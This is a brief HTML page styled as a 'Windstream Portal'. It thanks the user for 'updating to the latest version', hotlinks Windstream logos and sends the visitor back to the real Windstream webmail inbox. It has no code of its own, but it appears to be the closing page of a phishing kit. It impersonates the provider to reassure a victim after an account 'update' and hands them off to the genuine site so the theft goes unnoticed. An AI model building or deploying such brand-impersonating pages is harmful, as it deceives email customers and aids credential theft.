<!DOCTYPE html>
<html>
<head>
<link rel="shortcut icon" href="https://www.windstream.com/Windstream-residential/media/res/kentico_mobile_header.png">
	<meta charset="UTF-8">
	<title>Windstream Portal</title>
	<link href="style.css" rel="stylesheet">
</head>
<body>

<p>
<p>
<p>
<p>
<div class="login-page">
<div class="form">

<img align="middle" alt="Kinetic by Windstream" src="https://www.windstream.com/Windstream-residential/media/res/Kinetic-Horizontal.svg""200" width="190">
<br>
<div style="background-color:Royale Blue">
<h5>Thank You for updating to the latest version!</h5>
<h5>You can relax knowing that we maintain our servers, so you can benefit from reliable email without management hassles.</h5>
</div>
<p>
<a href="https://webmail.windstream.net/mail#3"><button> Back to <span style='font-size:17px;'>&#8680;</span> INBOX </button>
<br>
<p>
<br>
